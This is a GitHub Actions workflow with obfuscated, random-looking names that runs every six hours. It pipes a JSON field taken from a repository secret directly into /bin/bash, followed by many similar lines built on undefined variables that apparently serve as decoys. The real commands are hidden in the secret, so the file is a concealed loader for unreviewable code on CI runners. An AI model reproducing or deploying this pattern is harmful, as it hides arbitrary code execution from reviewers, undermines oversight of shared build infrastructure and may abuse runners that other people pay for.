name: tuxiumc
on:
  workflow_dispatch:
  schedule:
    - cron: '40 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: tuxiumc
        env:
          axoj44: ${{ secrets.axoj44 }}
        run: |
          echo $axoj44 | jq -r .ffnoo8 | /bin/bash
          echo $q2444 | jq -r .s36 | /bin/bash
          echo $ti41 | jq -r .vbdry497 | /bin/bash
          echo $wstsi04 | jq -r .v3 | /bin/bash
          echo $yionf186 | jq -r .ekw8 | /bin/bash
          echo $crbr62290 | jq -r .c80 | /bin/bash
          echo $dja82550 | jq -r .b7885 | /bin/bash
          echo $qx63 | jq -r .fmv6415 | /bin/bash
          echo $c9047 | jq -r .x59801 | /bin/bash
          echo $hokk66280 | jq -r .dwzim42545 | /bin/bash
          echo $kq6 | jq -r .po22 | /bin/bash
          echo $opi8 | jq -r .wjwyq330 | /bin/bash
          echo $egput721 | jq -r .srfj780 | /bin/bash
          echo $wmhj69042 | jq -r .cmkhe80319 | /bin/bash
          echo $muvi013 | jq -r .hhzh05433 | /bin/bash

